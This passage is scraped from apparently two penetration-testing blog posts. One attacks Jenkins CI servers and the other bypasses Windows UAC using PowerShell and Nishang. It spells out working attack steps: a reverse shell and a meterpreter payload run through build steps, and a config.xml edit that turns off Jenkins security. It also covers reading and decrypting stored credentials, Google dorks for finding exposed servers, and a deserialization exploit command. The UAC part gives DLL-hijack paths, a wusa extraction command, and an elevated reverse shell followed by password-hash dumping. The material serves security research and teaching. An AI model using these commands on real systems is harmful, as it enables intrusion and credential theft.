<div style="text-align: justify;">
We can keep trying unless we find a user with Configure rights for a project. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV4Nvl6xktU4yQd3vkekYu1OVpC2QT5sFcpGF_xfengvsYFS3liotBEfydou4aL391UpEogO_uAxztiv6035WK7XKhQjpqN73B5CEmva5_XkunA56IlDyWK919unmDmbcC6pAlYnyxIrk/s1600/configuser_dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV4Nvl6xktU4yQd3vkekYu1OVpC2QT5sFcpGF_xfengvsYFS3liotBEfydou4aL391UpEogO_uAxztiv6035WK7XKhQjpqN73B5CEmva5_XkunA56IlDyWK919unmDmbcC6pAlYnyxIrk/s400/configuser_dashboard.png" width="400" /></a></div>
<div style="text-align: justify;">
Good. With the ability to Configure builds we can do much fun stuff!</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h3>
Executing Commands</h3>
With the privileges to configure builds, we can add/edit "Build Steps" of a project. Build steps provide various options like Executing batch or shell commands (or even more depending on the installed plugins). Lets try it out!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgchW2pVNZcsgCUOeYq0tiHqzjyvCM2-oQh1N6GFgs9UVausVVKVHZcKPuGM5X959B1Wksgr2918WLt74M0eKLoyHQ1Ksz_OZLnTiw54Hr4-OruOCjZac1GcO0DkTr8z89Kyh9pgn7mkfI/s1600/Jenkins_whoami.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgchW2pVNZcsgCUOeYq0tiHqzjyvCM2-oQh1N6GFgs9UVausVVKVHZcKPuGM5X959B1Wksgr2918WLt74M0eKLoyHQ1Ksz_OZLnTiw54Hr4-OruOCjZac1GcO0DkTr8z89Kyh9pgn7mkfI/s400/Jenkins_whoami.png" width="400" /></a></div>
Bingo! We have command execution with SYSTEM privileges on a Windows slave node. Note that this is a feature of Jenkins and not a vulnerability. <br />
<br />
I advocate using PowerShell wherever we can to improve the existing techniques of penetration testing. In the current scenario, we can move to a reverse shell from this simple command execution by using PowerShell. There is no need to drop a binary or any other tool for that. Lets use <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1">Invoke-PowerShellTcpOneLine.ps1 from Nishang</a>. The script contains two one-line shells, we just need to use one of them so remove the other line of code from the script. To execute it from memory, we must encode it using Invoke-Encode from Nishang with the -OutCommand parameter.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\nishang> . .\Utility\Invoke-Encode.ps1
PS C:\nishang> Invoke-Encode -DataToEncode .\Shells\Invoke-PowerShellTcpOneLine.ps1 -OutCommand</textarea></pre>
Now the generated encoded script from "encodedcommand.txt" file could be used with PowerShell's -encodedcommand parameter to execute the script without touching disk.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EMJE6gv_j3oKDTqEZ4PvqKH6o7znhZvvt9SldBMIq68eQw_Qd2DpPHrnR76_nF-Gute0I_cW7X6mHTHuu2GJ2oLlxHeIV0QYaNQlWAjE-4HKBISp7aEvUYISIDuHT9kewfY0n4SDl8U/s1600/Jenkins_reverseshell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EMJE6gv_j3oKDTqEZ4PvqKH6o7znhZvvt9SldBMIq68eQw_Qd2DpPHrnR76_nF-Gute0I_cW7X6mHTHuu2GJ2oLlxHeIV0QYaNQlWAjE-4HKBISp7aEvUYISIDuHT9kewfY0n4SDl8U/s400/Jenkins_reverseshell.png" width="400" /></a></div>
Great! An in-memory reverse shell with SYSTEM privileges! There is a reason why we use Powershell :)<br />
<br />
For metasploit fans (like me), we can also get a reverse meterpreter by abusing this functionality. We must generate a payload using "./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=[IPAddress] -f psh-cmd". The generate payload can then be used like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGiq6CR64Cc-Lg87eBJLRQCIHv0zyN2Ck_TjeTmOY7sR9g0emv8HguQ3pkBPJi7tFfbTaOgYnEVbgwYeTJnPjtc_E9nveD6HEho20mlMImWGvHlPjHXFF4m9yIKh5Tb5L-GSW6YYoZKk/s1600/Jenkins_meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGiq6CR64Cc-Lg87eBJLRQCIHv0zyN2Ck_TjeTmOY7sR9g0emv8HguQ3pkBPJi7tFfbTaOgYnEVbgwYeTJnPjtc_E9nveD6HEho20mlMImWGvHlPjHXFF4m9yIKh5Tb5L-GSW6YYoZKk/s400/Jenkins_meterpreter.png" width="400" /></a></div>
Awesome, isn't it?<br />
<br />
Note that we executed the commands by utilizing ability to configure builds on a slave. Projects could be configured to use the executor on master as well. If we have the ability to configure builds on master, couple of more interesting attacks could be executed. <br />
<br />
<h4>
Removing Security</h4>
If we can configure builds on master, we can remove all the security for the Jenkins server. See <a href="https://wiki.jenkins-ci.org/display/JENKINS/Disable+security">this</a>. We just need to remove/rename or edit config.xml from the $JENKINS_HOME/config directory and restart the Jenkins service. If editing, we just need to replace [useSecurity]true[/useSecurity] with [useSecurity]false[/useSecurity] in the config.xml (in case Realm and authorization . For Windows, we can use the below PowerShell commands to edit config.xml<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">powershell "(cat C:\test\config.xml) -replace('<usesecurity>true</useSecurity>','<usesecurity>false</useSecurity>') | Set-Content C:\test\config.xml</textarea></pre>
<br />
To know $JENKINS_HOME, see the build logs for any project on master. <br />
<br />
Running it as a build step on master and a service restart will result in removal of all security from the web console and anyone browsing to the URL will have admin rights. During my tests, I was unable to restart Jenkins service using PowerShell's Restart-Service or sc.exe on Windows. It was only from a meterpreter session when the service could be restarted. On *nix, it may not be possible to resatrt Jenkins service without root.<br />
<br />
<h4>
Decrypt Credentials</h4>
It is possible to retrieve credentials stored by Jenkins in clear text. This include passwords, passphrases, SSH keys (including private keys) and more which are saved using the Manage Credentials section of an admin user. By abusing ability to configure build on master we can read and decrypt the credentials. A thorough blog post from where I stole the technique from is this: <a href="http://thiébaud.fr/jenkins_credentials.html">http://thiébaud.fr/jenkins_credentials.html</a><br />
<br />
We need three pieces of information from Jenkins master:<br />
<ol>
<li>credentials.xml from the $JENKINS_HOME directory which contains the encrypted passwords.</li>
<li> hudson.util.secret from the $JENKINS_HOME\secrets directory which encrypts the passwords.</li>
<li>master.key from the $JENKINS_HOME\secrets directory which encrypts hudson.util.secret.</li>
</ol>
On a Windows master, below PowerShell commands could be used to read these files. Note that we are reading hudson.util.secret and master.key in bytes to preserve their format.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">powershell -c "cat 'C:\Program Files (x86)\Jenkins\credentials.xml'"
powershell -c "cat -encoding byte 'C:\Program Files (x86)\Jenkins\secrets\master.key'"
powershell -c "cat -encoding byte -path 'C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret'"</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKwVTaGpjkh82vgk31I9l_C6mHQ-S02FDSpQiItlYXMasobk-XPW4AZ2KMICMdfOjDGSARPeXSl1-F4nzxLE0Gz5yQPm3OMDejgfHd3fFlOM9gHfHyZvzAULcZ5Zem3F-XF5F23FRv2g8/s1600/jenkins_decrypt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKwVTaGpjkh82vgk31I9l_C6mHQ-S02FDSpQiItlYXMasobk-XPW4AZ2KMICMdfOjDGSARPeXSl1-F4nzxLE0Gz5yQPm3OMDejgfHd3fFlOM9gHfHyZvzAULcZ5Zem3F-XF5F23FRv2g8/s400/jenkins_decrypt.png" width="400" /></a></div>
The keys could be converted back to the raw format using <a href="https://github.com/samratashok/nishang/blob/master/Utility/TexttoExe.ps1">TexttoExe from Nishang</a> (or any other tool or script on *nix). <br />
<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\nishang> . C:\nishang\Utility\TexttoExe.ps1
PS C:\nishang> TexttoEXE -FileName C:\test\hudson.util.txt -EXE C:\test\hudson.util.secret
PS C:\nishang> TexttoEXE -FileName C:\test\master.txt -EXE C:\test\master.key
</textarea></pre>
Using decrypt.py from <a href="https://github.com/samratashok/ContinuousIntrusion">here</a> (updated version of the one <a href="https://github.com/tweksteen/jenkins-decrypt/">here</a>) the passwords can be decrypted:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeQMLoe-7QC-TresPXtIzM1wjRlXtvIeGkza_-zSVr4e5SNZoZdwAmoIKRgagxISu5pbzQgw8B9tH2-ooxfhrc3nTk7BbFUXpWjU7xkvzwy_xJFQADUIhf-rU01a7wBMANnp-UO1eOyXs/s1600/jenkins_decrypted.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeQMLoe-7QC-TresPXtIzM1wjRlXtvIeGkza_-zSVr4e5SNZoZdwAmoIKRgagxISu5pbzQgw8B9tH2-ooxfhrc3nTk7BbFUXpWjU7xkvzwy_xJFQADUIhf-rU01a7wBMANnp-UO1eOyXs/s400/jenkins_decrypted.png" width="400" /></a></div>
Bingo! And this is 2015. Lets all of us do a facedesk together.<br />
<br />
Note that in case of SSH keys, above exercise is required to retrieve only the passphrase. SSH keys are stored in clear in the $JENKINS_HOME or in credentials.xml in clear text! Also, no salt is used to encrypt the passwords so it is possible to compare encrypted passwords from Jenkins with known encrypted text.<br />
<br />
<h4>
Google Dorks</h4>
Use the below Google dorks for public instances of Jenkins. More could be created depending on the use case:<br />
Public instances: intitle:"Dashboard [Jenkins]"<br />
Public instances with no authentication: intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins"<br />
<br />
Just replace Jenkins with Hudson in above for Hudson instances.<br />
<br />
The kind of sensitive data exposed by public instances of Jenkins is amazing! They leak much about the source code creation and management. While while looking at such instances one can find passwords for private source code repositories, links to under development products, employee data and more, what I found was more interesting than any of these.<br />
<br />
In the screenshot below, someone left an interesting message on a public unauthenticated server of Jenkins.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBOtFeKhVXu3aAjwIYd5M67u7AVCm0siFZUD35agfjFgavK1gEf1f8gkb9_NjpgzZXFkFlsDV7RW5dZNkUPVBtkkGD3RGWlvGxjxMwqdNQLouklowZ9uicrI_EGYkLHNbT05NywwGA1dY/s1600/Jenkins_Public_Msg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBOtFeKhVXu3aAjwIYd5M67u7AVCm0siFZUD35agfjFgavK1gEf1f8gkb9_NjpgzZXFkFlsDV7RW5dZNkUPVBtkkGD3RGWlvGxjxMwqdNQLouklowZ9uicrI_EGYkLHNbT05NywwGA1dY/s400/Jenkins_Public_Msg.png" width="400" /></a></div>
Another one, highlighting the state of security of CI tools is below. This Jenkins instance runs as root without authentication:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSyuPqPD4AAEtTAZ8Ie9onHbuELc0YU7GRbjz7HM1-B6rgHQVz2-HEnLLfxYuOz_bDjEYQgtjkeE4GVqjCeNvj_fjqcYNe0ZxSUtLMchxr3qleAfLTe0guHMwTggtfNvRNMo1kYLzD5E/s1600/Jenkins_Public_Root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTSyuPqPD4AAEtTAZ8Ie9onHbuELc0YU7GRbjz7HM1-B6rgHQVz2-HEnLLfxYuOz_bDjEYQgtjkeE4GVqjCeNvj_fjqcYNe0ZxSUtLMchxr3qleAfLTe0guHMwTggtfNvRNMo1kYLzD5E/s400/Jenkins_Public_Root.png" width="400" /></a></div>
<h4>
Unserialization Vulnerability</h4>
<br />
In case you missed it, Jenkins (and many more tools) were affected by the Unserialization bug in commons-collection Java library. Read more about it <a href="http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/">here</a>.<br />
<br />
This vulnerability could be exploited to get remote command execution on a Jenkins instance. All we need is:<br />
<ol></ol>
1. Get the ysoserial (cool name!) from here: <a href="https://github.com/frohoff/ysoserial">https://github.com/frohoff/ysoserial</a> </div>
<div style="text-align: justify;">
2. Create a reverse shell using ysoserial:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'powershell.exe -e <encoded_reverse_shell>' > payload.out
</textarea></pre>
3. Get the Jenkins exploit from here: <a href="https://github.com/foxglovesec/JavaUnserializeExploits">https://github.com/foxglovesec/JavaUnserializeExploits</a><br />
4. Use it against a Jenkins instance (in your lab): <br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">python jenkins_exploit.py 192.168.230.125 8080 payload.out
</textarea></pre>
5. Do the victory dance. </div>
<div style="text-align: justify;">
<br />
This is how success looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFix1U3hSfFMHNOuAEl4NFWlMYdgBE86mAABzgAgfGyWPI3bYbmmdG8l_HjnJXpm4TGbAfR-ODSwkOCL62mhRNP28MCUPcV7wleP6rcakr3Nor1YyJTI0eT0T9I_AOdYA-JE4J1hu0D90/s1600/jenkins_unserialize.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFix1U3hSfFMHNOuAEl4NFWlMYdgBE86mAABzgAgfGyWPI3bYbmmdG8l_HjnJXpm4TGbAfR-ODSwkOCL62mhRNP28MCUPcV7wleP6rcakr3Nor1YyJTI0eT0T9I_AOdYA-JE4J1hu0D90/s400/jenkins_unserialize.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Instances exposed on the internet may be safe because the exploit connects on a higher port which is random (Port 49189 in the above screenshot). If an environment allows connections to such ports from the Internet they probably have bigger problems to solve.<br />
<br />
Jenkins released a fix on 11th November, 2015 which could be <a href="https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11">found here</a>.<br />
<br />
<h4>
Video Demonstration</h4>
I made a quick video to demonstrate attacks discussed in this post. <br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/hdT_8tjqxrE/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/hdT_8tjqxrE?feature=player_embedded" width="320"></iframe></div>
<h4>
Slides of my talk at BlackHat Europe and DeepSec</h4>
I gave a talk at BlackHat Europe and DeepSec on Continuous Intrusion: Why CI tools are an attacker's best friends. Slides are here:<br />
<b><a href="http://www.slideshare.net/nikhil_mittal/continuous-intrusion-why-ci-tools-are-an-attackers-best-friends">http://www.slideshare.net/nikhil_mittal/continuous-intrusion-why-ci-tools-are-an-attackers-best-friends</a></b><br />
<br />
Hope you enjoyed the post! Feedback and comments are welcome :)<br />
<br /></div>
To support my research, join me for a two days training "<b>PowerShell for Penetration Testers</b>" at:<br />
<br />
<b>BlackHat, Asia (March 29-30th, 2016) </b>- https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html<br />
<br />
<b>HITB, Amsterdam (May 24-25th, 2016) </b>- http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/ </div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com3tag:blogger.com,1999:blog-8135211063584500909.post-76702813924877511512015-09-30T23:10:00.001+05:302018-01-14T22:48:15.176+05:30Bypassing UAC with PowerShell<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Recently during a Red Team engagement, I got shell access to some user machines using <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">Client Side Attacks</a>. In many cases, the users had administrative privileges but I was stuck into non-elevated PowerShell reverse <a href="http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html">shells</a>. UAC (User Account Control) was the spoilsport here. I hate UAC, it is annoying yet it "<a href="https://support.microsoft.com/en-us/kb/2526083">is not a security boundary</a>". I read and tried stuff for bypassing UAC and learned that it is trivial to bypass it. In this post, we will go through various methods and code required to bypass UAC.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The tool of choice for bypassing UAC is UACME <a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a>. This awesome tool implements various methods and is thankfully open source. Thanks to <a href="https://twitter.com/hFireF0X">@hFirF0XAs</a>.<br />
<br />
As I always try to keep the post-exploitation phase within PowerShell, I tested UACME and implemented some of the methods using PowerShell . I give you <b>Invoke-PsUACme.ps1</b>. It could be found in the <a href="https://github.com/samratashok/nishang/tree/master/Escalation">Escalation category</a> of Nishang. </div>
<div style="text-align: justify;">
Lets begin with the sysprep method which is the most commonly used method of bypassing UAC. Made famous by Leo Davidson in 2009 (<a href="http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html">details here</a>), it involves the following steps:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
1. Copy/plant a DLL in the C:\Windows\System32\sysprep directory. The name of the DLL depends on the Windows version.<br />
CRYPTBASE.dll for Windows 7<br />
shcore.dll for Windows 8</div>
<div style="text-align: justify;">
2. Execute sysprep.exe from the above directory. It will load the the above DLL and execute it with elevated privileges. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In fact, all the UAC bypass methods involve playing with DLL and executable names and locations. See the table below:</div>
<style type="text/css">
table.tableizer-table {
border: 1px solid #CCC; font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #ccc;
}
.tableizer-table th {
background-color: #104F8C;
color: #FFF;
font-weight: bold;
}
</style><br />
<table class="tableizer-table"><tbody>
<tr class="tableizer-firstrow"><th>Method Name</th><th>Write DLL to</th><th>DLL Name</th><th>Executable to Use</th></tr>
<tr><td>sysprep</td><td>C:\Windows\System32\sysprep\</td><td>CRYPTBASE.dll for Windows 7 and shcore.dll for Windows 8</td><td>C:\Windows\System32\sysprep\sysprep.exe</td></tr>
<tr><td>oobe</td><td>C:\Windows\System32\oobe\</td><td>wdscore.dll for Windows 7, 8 and 10</td><td>C:\Windows\System32\oobe\setupsqm.exe</td></tr>
<tr><td>actionqueue</td><td>C:\Windows\System32\sysprep\</td><td>ActionQueue.dll only for Windows 7</td><td>C:\Windows\System32\sysprep\sysprep.exe</td></tr>
<tr><td>migwiz</td><td>C:\Windows\System32\migwiz\</td><td>wdscore.dll for both Windows 7 and 8</td><td>C:\Windows\System32\migwiz\migwiz.exe</td></tr>
<tr><td>cliconfg</td><td>C:\Windows\System32\</td><td>ntwdblib.dll for Windows 7, 8 and 10</td><td>C:\Windows\System32\cliconfg.exe</td></tr>
<tr><td>winsat</td><td>C:\Windows\System32\sysprep\Copy winsat.exe from C:\ Windows\System32\ to C:\Windows\System32\sysprep\</td><td>ntwdblib.dll for Windows 7 and devobj.dll for Windows 8 and 10</td><td>C:\Windows\System32\sysprep\winsat.exe</td></tr>
<tr><td>mmc</td><td>C:\Windows\System32\</td><td>ntwdblib.dll for Windows 7 and elsext.dll for Windows 8 and 10.</td><td>C:\Windows\System32\mmc.exe eventvwr</td></tr>
</tbody></table>
<div style="text-align: left;">
<style type="text/css"><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}</style></div>
<span data-sheets-userformat="[null,null,513,[null,0],null,null,null,null,null,null,null,null,0]" data-sheets-value="[null,2,"Windows 7 build 6.1.7601.65536\nWindows 8.1 build 6.3.9600.0\nWindos 10 build 10.0.10240.0"]" style="font-family: arial,sans,sans-serif; font-size: 13px;">Builds Tested:</span>
<br />
<div style="text-align: left;">
<span data-sheets-userformat="[null,null,513,[null,0],null,null,null,null,null,null,null,null,0]" data-sheets-value="[null,2,"Windows 7 build 6.1.7601.65536\nWindows 8.1 build 6.3.9600.0\nWindos 10 build 10.0.10240.0"]" style="font-family: arial,sans,sans-serif; font-size: 13px;">Windows 7 build 6.1.7601.65536</span><br />
<span data-sheets-userformat="[null,null,513,[null,0],null,null,null,null,null,null,null,null,0]" data-sheets-value="[null,2,"Windows 7 build 6.1.7601.65536\nWindows 8.1 build 6.3.9600.0\nWindos 10 build 10.0.10240.0"]" style="font-family: arial,sans,sans-serif; font-size: 13px;">Windows 8.1 build 6.3.9600.0 </span><br />
<span data-sheets-userformat="[null,null,513,[null,0],null,null,null,null,null,null,null,null,0]" data-sheets-value="[null,2,"Windows 7 build 6.1.7601.65536\nWindows 8.1 build 6.3.9600.0\nWindos 10 build 10.0.10240.0"]" style="font-family: arial,sans,sans-serif; font-size: 13px;">Windows 10 build 10.0.10240.0</span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Now, to copy the DLL to the the sysprep directory, we need elevated privileges. The two most popular ways of achieving this elevation are: use an IFileOperation COM object or use Wusa.exe with its "extract" option.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Currently, Invoke-PsUACme uses the Wusa method. Since Wusa is set to auto-elevate, we can use it to extract a cab file to the sysprep directory. A cab file could be created using the makecab utility.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">C:\> makecab C:\uac\evil.dll C:\uac\uac.cab
C:\> wusa C:\uac\uac.cab /extract:C:\Windows\System32\sysprep\</textarea></pre>
<div style="text-align: justify;">
Above commands are there just for explaining what Invoke-PsUACme does. We need not run the commands manually.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<div style="text-align: justify;">
Now, the DLL which Invoke-PsUACme uses is Fubuki from the UACME project with a minor change. Instead of executing cmd.exe, we tell the DLL to execute cmd.bat from C:\Windows\Temp. It is this cmd.bat which will contain our payload to be executed on the target. This provides us a lot of flexibility while executing complex attacks.
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQQGU_tAOom-9mWV4VvPFMit-Z9uKpztA6vYqaNjcJT6BRFLWPFVhM_MtvmBZG1zxWWjUsFoNZZQRQia9mYMxLHRFYhz5uLEK9ho03wQp0qeiQrl79O37JMh3JNh3rBxePkzwIeT_zO8c/s1600/Fubuki.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQQGU_tAOom-9mWV4VvPFMit-Z9uKpztA6vYqaNjcJT6BRFLWPFVhM_MtvmBZG1zxWWjUsFoNZZQRQia9mYMxLHRFYhz5uLEK9ho03wQp0qeiQrl79O37JMh3JNh3rBxePkzwIeT_zO8c/s400/Fubuki.png" width="400" /> </a></div>
Above DLLs (for 64 bit and 32 bit) are hard coded in the script in DLLBytes64 and DLLBytes32 variables. The script is able to determine the bit-ness of the process from which it is called and uses the apt DLL.<br />
<br />
Coming to the more interesting part, Invoke-PsUACme could be used this way:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> . C:\nishang\Escalation\Invoke-PsUACme.ps1
PS C:\> Invoke-PsUACme -method sysprep</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDkTAuGXlHXelQsNa9unidDtYglj575XqpYhPtMZUVi-S50B7ZdK16VQiiV7J33mz9XCSd8hhQ9SxFgh6Xn1elRUn2MDAfLiIijfJIiFTkim0QRK96cc0nrOwY9-ni8zg5e6LbXFslBSw/s1600/Invoke-PsUAC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDkTAuGXlHXelQsNa9unidDtYglj575XqpYhPtMZUVi-S50B7ZdK16VQiiV7J33mz9XCSd8hhQ9SxFgh6Xn1elRUn2MDAfLiIijfJIiFTkim0QRK96cc0nrOwY9-ni8zg5e6LbXFslBSw/s400/Invoke-PsUAC.png" width="400" /></a></div>
Nice, we are able to bypass UAC! The default payload just checks if the bypass was successful.
Note that the -noexit parameter is passed to PowerShell in cmd.bat so that we can see the output.<br />
<br />
<h4>
Custom Payload</h4>
We can always use custom payloads as well:
<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-PsUACme -method oobe -Payload "powershell -noexit -c Get-Process" </textarea></pre>
Note that we need to specify the powershell.exe as well. Whatever is specified for the Payload parameter ends up in C:\Windows\Temp\cmd.bat. You can always change the path to the batch file using the PayloadPath parameter after changing it in the DLL.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhP4NTEeyPnZVt0qQPL5KkmwfxDhrDk8-jXnAZH3u59Bkgzk_SetS1Xugq9tkzTwrX3e_IwXN1eLZaG6pjAWTOI3g7GsV8Rohg_reAh1FBFZ1ZWbFdFDCmT8S277UPysmCwP0Rl59ovo/s1600/cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfhP4NTEeyPnZVt0qQPL5KkmwfxDhrDk8-jXnAZH3u59Bkgzk_SetS1Xugq9tkzTwrX3e_IwXN1eLZaG6pjAWTOI3g7GsV8Rohg_reAh1FBFZ1ZWbFdFDCmT8S277UPysmCwP0Rl59ovo/s320/cmd.png" width="320" /></a></div>
We will come back to more practical use of the Payload parameter in a minute.<br />
<br />
<h4>
Custom DLL</h4>
To use a Custom DLL, we can use the CustomDLL64 and CustomDLL32 parameters. For example, lets use the original 64 bit Fubuki DLL from UACME and use it with Invoke-PsUACme</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-PSUACMe -CustomDll64 C:\test\Fubuki64.dll -CustomDll32 C:\test\Fubuki32.dll -Verbose" </textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzLW6uKlifYEQe2rwpL8-uDSoc0Et_dym84gkZPQ037s0R4F0KnGOyyvoaTv6GiShIT9dfKAGbdGfkh9uAtsQ1xa3TA480oLWGjvI7qJxsPciXCunxPtLwsN11IvkZ-say1SXwG389pEk/s1600/Fubuki_32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzLW6uKlifYEQe2rwpL8-uDSoc0Et_dym84gkZPQ037s0R4F0KnGOyyvoaTv6GiShIT9dfKAGbdGfkh9uAtsQ1xa3TA480oLWGjvI7qJxsPciXCunxPtLwsN11IvkZ-say1SXwG389pEk/s400/Fubuki_32.png" width="400" /></a></div>
We can also prvide a byte array of DLLs to the DLLBytes64 and DLLBytes32 parameter.<br />
<br />
<h4>
Ok, fine. How is it useful?</h4>
Lets recreate the scenario with which I started the post, we have few reverse PowerShell shells with no elevated rights. We can use Invoke-PsUACme to execute commands and scripts with elevated rights. Lets use <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1">reverse TCP one liner</a> from Nishang, encode it using <a href="https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Encode.ps1">Invoke-Encode</a> and use it with Invoke-PsUACme:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjige-Fmt0z8SztPoPGrdzRQZVfG1elOHgIXVS0jrLHWY6rBkMIncpqSB1AxdlIgNEgbBbwNZu99JwT1oenMPlew9h85JVr7GlhBXmaAI71B8UHAav3sTxhVGVOOGQ3EL_ANJm278NMF78/s1600/UAC_Hashes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjige-Fmt0z8SztPoPGrdzRQZVfG1elOHgIXVS0jrLHWY6rBkMIncpqSB1AxdlIgNEgbBbwNZu99JwT1oenMPlew9h85JVr7GlhBXmaAI71B8UHAav3sTxhVGVOOGQ3EL_ANJm278NMF78/s400/UAC_Hashes.png" width="400" /></a></div>
Awesome! We successfully bypassed UAC and elevated our privileges. To verify it, we ran Get-PassHashes from <a href="https://github.com/samratashok/nishang/tree/master/powerpreter">Powerpreter</a>.<br />
<br />
